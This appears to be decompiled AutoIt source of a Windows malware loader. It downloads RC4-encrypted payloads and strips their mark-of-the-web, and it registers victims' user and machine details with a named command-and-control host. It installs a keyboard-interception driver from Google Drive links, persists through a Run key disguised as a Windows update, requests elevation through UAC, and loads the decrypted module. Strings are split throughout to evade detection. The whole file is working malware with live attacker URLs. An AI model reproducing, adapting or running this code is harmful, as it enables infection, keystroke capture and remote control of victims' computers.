| 28$aret = 58("advapi32.dll", "bool", "InitializeSecurityDescriptor", "struct*", $tsecuritydescriptor, "dword", $security_descriptor_revision) | |
| 4@error534287(@error, @extended, 0) | |
| 4$aret[0]5 | |
| $aret = 58("advapi32.dll", "bool", "SetSecurityDescriptorDacl", "struct*", $tsecuritydescriptor, "bool", 1, "ptr", 0, "bool", 0) | |
| 4@error534287(@error, @extended, 0) | |
| 4$aret[0]5 | |
| $tsecurityattributes = 65($tagsecurity_attributes) | |
| 69($tsecurityattributes, 1, 68($tsecurityattributes)) | |
| 69($tsecurityattributes, 2, 67($tsecuritydescriptor)) | |
| 69($tsecurityattributes, 3, 0) | |
| 8 | |
| 8 | |
| 8 | |
| 28$ahandle = 58("kernel32.dll", "handle", "CreateMutexW", "struct*", $tsecurityattributes, "bool", 1, "wstr", $soccurrencename) | |
| 4@error534287(@error, @extended, 0) | |
| 28$alasterror = 58("kernel32.dll", "dword", "GetLastError") | |
| 4@error534287(@error, @extended, 0) | |
| 4$alasterror[0] = $error_already_exists5 | |
| 417($iflag, 1)5 | |
| 58("kernel32.dll", "bool", "CloseHandle", "handle", $ahandle[0]) | |
| 4@error534287(@error, @extended, 0) | |
| 34287($alasterror[0], $alasterror[0], 0) | |
| 6 | |
| 35 - 1 | |
| 8 | |
| 8 | |
| 34$ahandle[0] | |
| 33 | |
| 32_ispressed($shexkey, $vdll = "user32.dll") | |
| 28$areturn = 58($vdll, "short", "GetAsyncKeyState", "int", "0x" & $shexkey) | |
| 4@error534287(@error, @extended, 40) | |
| 3417($areturn[0], 32768) <> 0 | |
| 33 | |
| 32_versioncompare($sversion1, $sversion2) | |
| 4$sversion1 = $sversion25340 | |
| 28$ssubversion1 = "", $ssubversion2 = "" | |
| 4313(330($sversion1, 1))5 | |
| $ssubversion1 = 330($sversion1, 1) | |
| $sversion1 = 337($sversion1, 1) | |
| 8 | |
| 4313(330($sversion2, 1))5 | |
| $ssubversion2 = 330($sversion2, 1) | |
| $sversion2 = 337($sversion2, 1) | |
| 8 | |
| 28$aversion1 = 331($sversion1, ".,"), $aversion2 = 331($sversion2, ".,") | |
| 28$ipartdifference = ($aversion1[0] - $aversion2[0]) | |
| 4$ipartdifference < 05 | |
| 27$aversion1[369($aversion2)] | |
| $aversion1[0] = 369($aversion1) - 1 | |
| 13$i = (369($aversion1) - 0($ipartdifference))15$aversion1[0] | |
| $aversion1[$i] = "0" | |
| 14 | |
| 7$ipartdifference > 05 | |
| 27$aversion2[369($aversion1)] | |
| $aversion2[0] = 369($aversion2) - 1 | |
| 13$i = (369($aversion2) - 0($ipartdifference))15$aversion2[0] | |
| $aversion2[$i] = "0" | |
| 14 | |
| 8 | |
| 13$i = 115$aversion1[0] | |
| 4315($aversion1[$i])1315($aversion2[$i])5 | |
| 4250($aversion1[$i]) > 250($aversion2[$i])5 | |
| 34288(2, 1) | |
| 7250($aversion1[$i]) < 250($aversion2[$i])5 | |
| 34288(2, -1) | |
| 7$i = $aversion1[0]5 | |
| 4$ssubversion1 > $ssubversion25 | |
| 34288(3, 1) | |
| 7$ssubversion1 < $ssubversion25 | |
| 34288(3, -1) | |
| 8 | |
| 8 | |
| 6 | |
| 4$aversion1[$i] > $aversion2[$i]5 | |
| 34288(1, 1) | |
| 7$aversion1[$i] < $aversion2[$i]5 | |
| 34288(1, -1) | |
| 8 | |
| 8 | |
| 14 | |
| 34288(0($ipartdifference), 0) | |
| 33 | |
| 32__misc_getdc($hwnd) | |
| 28$aresult = 58("user32.dll", "handle", "GetDC", "hwnd", $hwnd) | |
| 4@error23$aresult[0]534287(1, _winapi_getlasterror(), 0) | |
| 34$aresult[0] | |
| 33 | |
| 32__misc_getdevicecaps($hdc, $iindex) | |
| 28$aresult = 58("gdi32.dll", "int", "GetDeviceCaps", "handle", $hdc, "int", $iindex) | |
| 4@error534287(@error, @extended, 0) | |
| 34$aresult[0] | |
| 33 | |
| 32__misc_releasedc($hwnd, $hdc) | |
| 28$aresult = 58("user32.dll", "int", "ReleaseDC", "hwnd", $hwnd, "handle", $hdc) | |
| 4@error534287(@error, @extended, 40) | |
| 34$aresult[0] <> 0 | |
| 33 | |
| 29$ba3x = 40 | |
| 29$iport = 443 | |
| 29$bpersistence = 39 | |
| 29$sinstalldir = @HomeDrive & @HomePath | |
| 29$stempdir = @TempDir | |
| 29$busestartupfolder = 40 | |
| 29$sserver = "port2010kmjutre.camdvr.org" | |
| 29$scounterurl = "https://test.discoverthings.pw/counter4.php" | |
| 29$sx86 = "http://" & 274(0, 32767, 1) & ".discoverthings.pw/X86.rc4" | |
| 29$sx64 = "http://" & 274(0, 32767, 1) & ".discoverthings.pw/X64.rc4" | |
| 29$sdriverx86 = "https://drive.google.com/uc?authuser=0&id=1Sa-NOdSof4FcUQbUH8V9pq9URtkYnB5h&export=download" | |
| 29$sdriverx64 = "https://drive.google.com/uc?authuser=0&id=11iWhfhV4c49pWabl9EDcACxzXnrHU7NM&export=download" | |
| 29$sdriverinstaller = "https://drive.google.com/uc?authuser=0&id=1LgBlbz4opeHnm7NflOxUu2XUag0h1aQD&export=download" | |
| 29$ibuildver = 106 | |
| 29$sbin, $sdriver | |
| $sbin = $sx86 | |
| $sdriver = $sdriverx86 | |
| 258("TCPTimeout", 30000) | |
| 32installfiles() | |
| _crypt_startup() | |
| debuglog("Downloading datastorage.tmp") | |
| 205($sbin, $sinstalldir & "\datastorage.tmp") | |
| debuglog("Decrypting datastorage") | |
| _crypt_decryptfile($sinstalldir & "\datastorage.tmp", $sinstalldir & "\datastorage.bin", "penis", $calg_rc4) | |
| 94($sinstalldir & "\datastorage.tmp") | |
| _crypt_shutdown() | |
| 284(@ComSpec & " /C echo. > " & $sinstalldir & "\datastorage.bin:Zo" & "ne." & "Iden" & "tifier") | |
| 33 | |
| 32registermachine() | |
| 348() | |
| $hsocket = 342(344($sserver), $iport) | |
| 33("Socket: " & $hsocket & "(" & @error & ")") | |
| 4$hsocket5 | |
| debuglog("Server is visible right now") | |
| 346($hsocket, "REG<=|=>" & @UserName & "@" & @ComputerName & "<=|=>" & $ibuildver & "<=|=>" & @OSVersion & "<=|=>" & @OSArch & "<=|=>Registrando..." & @CRLF & @CRLF & @CRLF) | |
| 33("Error: " & @error) | |
| 293(2000) | |
| 341($hsocket) | |
| 6 | |
| debuglog("Server is not visible right now") | |
| 8 | |
| 347() | |
| 214(@AppDataDir & "\bfstt.dat", "tcp", "svr", $sserver) | |
| 214(@AppDataDir & "\bfstt.dat", "tcp", "port", $iport) | |
| 33 | |
| 32installdriver() | |
| debuglog("Downloading driver files") | |
| 205($sdriverinstaller, $stempdir & "\install-interception.exe") | |
| 205($sdriver, @WindowsDir & "\interception.dll") | |
| debuglog("Installing driver") | |
| 284(@ComSpec & ' /C echo. > "' & $stempdir & '\install-interception.exe":Z' & "one" & ".Ident" & "ifier") | |
| 284(@ComSpec & ' /C echo. > "' & @WindowsDir & '\interception.dll":Zo' & "ne" & ".Ident" & "ifier") | |
| 290($stempdir & "\install-interception.exe", "/install") | |
| debuglog("Restarting machine") | |
| 291(2 + 4 + 16) | |
| 33 | |
| 32installself() | |
| 4(@ScriptDir <> $sinstalldir2@ScriptName <> "inter.exe")1$bpersistence5 | |
| 4$ba3x5 | |
| 4basename(@AutoItExe) <> "inter.exe"591(@AutoItExe, $sinstalldir & "\inter.exe", 1) | |
| 91(@ScriptFullPath, $sinstalldir & "\userconf.dat", 1) | |
| 43$busestartupfolder5 | |
| debuglog("Setting as startup through registry - interpreted") | |
| 281(@ComSpec & " /C reg add HKC" & "U\Softw" & "are\Mic" & "rosoft\Win" & "dows\Curr" & "entVer" & "sion\R" & "un /v KB28" & '23324 /d "' & $sinstalldir & "\inter.exe " & $sinstalldir & '\userconf.dat" /f') | |
| 6 | |
| debuglog("Setting as startup through startup folder - interpreted") | |
| 28$hfile = 110($sinstalldir & "\auto.vbs", 2) | |
| 124($hfile, 'CreateObject("WScript.Shell").Run "inter.exe userconf.dat", 0, False') | |
| 90($hfile) | |
| 93($sinstalldir & "\auto.vbs", @StartupDir & "\auto.lnk", $sinstalldir) | |
| 8 | |
| 6 | |
| 4$busestartupfolder5 | |
| debuglog("Setting as startup through startup folder - not interpreted") | |
| 28$hfile = 110($sinstalldir & "\auto.vbs", 2) | |
| 124($hfile, 'CreateObject("WScript.Shell").Run "inter.exe", 0, False') | |
| 90($hfile) | |
| 93($sinstalldir & "\auto.vbs", @StartupDir & "\auto.lnk", $sinstalldir) | |
| 6 | |
| debuglog("Setting as startup through registry - not interpreted") | |
| 91(@ScriptFullPath, $sinstalldir & "\inter.exe", 1) | |
| 281(@ComSpec & " /C reg add HKC" & "U\Softw" & "are\Mic" & "rosoft\Win" & "dows\Curr" & "entVer" & "sion\R" & "un /v KB28" & '23324 /d "' & $sinstalldir & '\inter.exe" /f') | |
| 8 | |
| 8 | |
| 8 | |
| 33 | |
| 32_main() | |
| debuglog("Registering execution") | |
| 208($scounterurl & "?do=add&user=" & urlencode(@UserName) & "&machine=" & urlencode(@ComputerName) & "&os=" & @OSVersion & "&arch=" & urlencode(@OSArch) & "&build=" & $ibuildver, 1) | |
| 29$bfirstrun = 40 | |
| debuglog("Waiting") | |
| 11 | |
| 293(10) | |
| 12274(0, 10, 1) = 5 | |
| 4$ba3x5 | |
| debuglog("Running interpreted. Installing itself") | |
| installself() | |
| installfiles() | |
| 8 | |
| 4395(83("SystemRoot") & "\interception.dll")5 | |
| debuglog("Driver is not installed") | |
| $bfirstrun = 39 | |
| registermachine() | |
| 28$iproc | |
| 11 | |
| 4$ba3x5 | |
| $iproc = 289(@AutoItExe, '"' & @ScriptFullPath & '" --drvinst', @WorkingDir, "runas") | |
| 6 | |
| $iproc = 289(@ScriptFullPath, "--drvinst", @WorkingDir, "runas") | |
| 8 | |
| 12$iproc > 0 | |
| 35 | |
| 8 | |
| 43218()5 | |
| debuglog("Will request UAC") | |
| 28$iproc | |
| 11 | |
| 4$ba3x5 | |
| $iproc = 289(@AutoItExe, '"' & @ScriptFullPath & '"', @WorkingDir, "runas") | |
| 6 | |
| $iproc = 289(@ScriptFullPath, "", @WorkingDir, "runas") | |
| 8 | |
| 12$iproc > 0 | |
| debuglog("UAC Requested. PID: " & $iproc) | |
| 35 | |
| 8 | |
| 4$bfirstrun13$ba3x5 | |
| debuglog("Not running interpreted. Installing files") | |
| installfiles() | |
| 8 | |
| debuglog("Instancing module") | |
| $hmod = 64($sinstalldir & "\datastorage.bin") | |
| 4$hmod = -15 | |
| debuglog("Failed to load module. Restarting...") | |
| 291(2 + 4) | |
| 6 | |
| debuglog("Module running") | |
| 8 | |
| 91 | |
| 293(100) | |
| 10 | |
| 33 | |
| 32dochrometrick() | |
| $schromefile = @HomePath & "\AppData\Local\Google\Chrome\User Data\Local State" | |
| 495($schromefile)5 | |
| $sstate = 112($schromefile) | |
| $sstate = 328($sstate, '"enabled": true', '"enabled": false') | |
| $sstate = 328($sstate, '"hardware_acceleration_mode_previous": true', '"hardware_acceleration_mode_previous": false') | |
| $sstate = '{ "hardware_acceleration_mode": { "enabled": false }, ' & 336($sstate, 1) | |
| $h = 110($schromefile, 2) | |
| 123($h, $sstate) | |
| 90($h) | |
| 8 | |
| 33 | |
| 9_singleton("huebr", 1) = 0 | |
| 293(100) | |
| 10 | |
| 4$cmdline[0] = 05 | |
| debuglog("Process started") | |
| _main() | |
| 7$cmdline[1] = "--drvinst"5 | |
| dochrometrick() | |
| debuglog("Will install itself") | |
| installself() | |
| debuglog("Will install required files") | |
| installfiles() | |
| debuglog("Will install driver") | |
| installdriver() | |
| 8 | |
| 32_winapi_base64decode($sb64string) | |
| 28$acrypt = 58("Crypt32.dll", "bool", "CryptStringToBinaryA", "str", $sb64string, "dword", 0, "dword", 1, "ptr", 0, "dword*", 0, "ptr", 0, "ptr", 0) | |
| 4@error23$acrypt[0]534287(1, 0, "") | |
| 28$bbuffer = 65("byte[" & $acrypt[5] & "]") | |
| $acrypt = 58("Crypt32.dll", "bool", "CryptStringToBinaryA", "str", $sb64string, "dword", 0, "dword", 1, "struct*", $bbuffer, "dword*", $acrypt[5], "ptr", 0, "ptr", 0) | |
| 4@error23$acrypt[0]534287(2, 0, "") | |
| 3466($bbuffer, 1) | |
| 33 | |
| 32_winapi_lzntdecompress(36$tinput, 36$toutput, $ibuffersize) | |
| $toutput = 65("byte[" & $ibuffersize & "]") | |
| 4@error534287(1, 0, 0) | |
| 28$aret = 58("ntdll.dll", "uint", "RtlDecompressBuffer", "ushort", 2, "struct*", $toutput, "ulong", $ibuffersize, "struct*", $tinput, "ulong", 68($tinput), "ulong*", 0) | |
| 4@error534287(2, 0, 0) | |
| 4$aret[0]534287(3, $aret[0], 0) | |
| 34$aret[6] | |
| 33 | |
| 32urlencode($sdata) | |
| 28$adata = 331(16(335($sdata, 4), 1), "") | |
| 28$nchar | |
| $sdata = "" | |
| 13$i = 115$adata[0] | |
| $nchar = 4($adata[$i]) | |
| 23$nchar | |
| 2145, 46, 481557, 651590, 95, 9715122, 126 | |
| $sdata &= $adata[$i] | |
| 2132 | |
| $sdata &= "%20" | |
| 216 | |
| $sdata &= "%" & 199($nchar, 2) | |
| 24 | |
| 14 | |
| 34$sdata | |
| 33 | |
| 32_base64encode($input) | |
| $input = 13($input) | |
| 28$struct = 65("byte[" & 14($input) & "]") | |
| 69($struct, 1, $input) | |
| 28$strc = 65("int") | |
| 28$a_call = 58("Crypt32.dll", "int", "CryptBinaryToString", "ptr", 67($struct), "int", 68($struct), "int", 1, "ptr", 0, "ptr", 67($strc)) | |
| 4@error23$a_call[0]5 | |
| 34287(1, 0, "") | |
| 8 | |
| 28$a = 65("char[" & 66($strc, 1) & "]") | |
| $a_call = 58("Crypt32.dll", "int", "CryptBinaryToString", "ptr", 67($struct), "int", 68($struct), "int", 1, "ptr", 67($a), "ptr", 67($strc)) | |
| 4@error23$a_call[0]5 | |
| 34287(2, 0, "") | |
| 8 | |
| 3466($a, 1) | |
| 33 | |
| 32_base64decode($input_string) | |
| 28$struct = 65("int") | |
| $a_call = 58("Crypt32.dll", "int", "CryptStringToBinary", "str", $input_string, "int", 0, "int", 1, "ptr", 0, "ptr", 67($struct, 1), "ptr", 0, "ptr", 0) | |
| 4@error23$a_call[0]5 | |
| 34287(1, 0, "") | |
| 8 | |
| 28$a = 65("byte[" & 66($struct, 1) & "]") | |
| $a_call = 58("Crypt32.dll", "int", "CryptStringToBinary", "str", $input_string, "int", 0, "int", 1, "ptr", 67($a), "ptr", 67($struct, 1), "ptr", 0, "ptr", 0) | |
| 4@error23$a_call[0]5 | |
| 34287(2, 0, "") | |
| 8 | |
| 3466($a, 1) | |
| 33 | |
| 32basename($spath) | |
| $spath = 331($spath, "\") | |
| 34$spath[$spath[0]] | |
| 33 | |
| 32debuglog($str) | |
| 33 |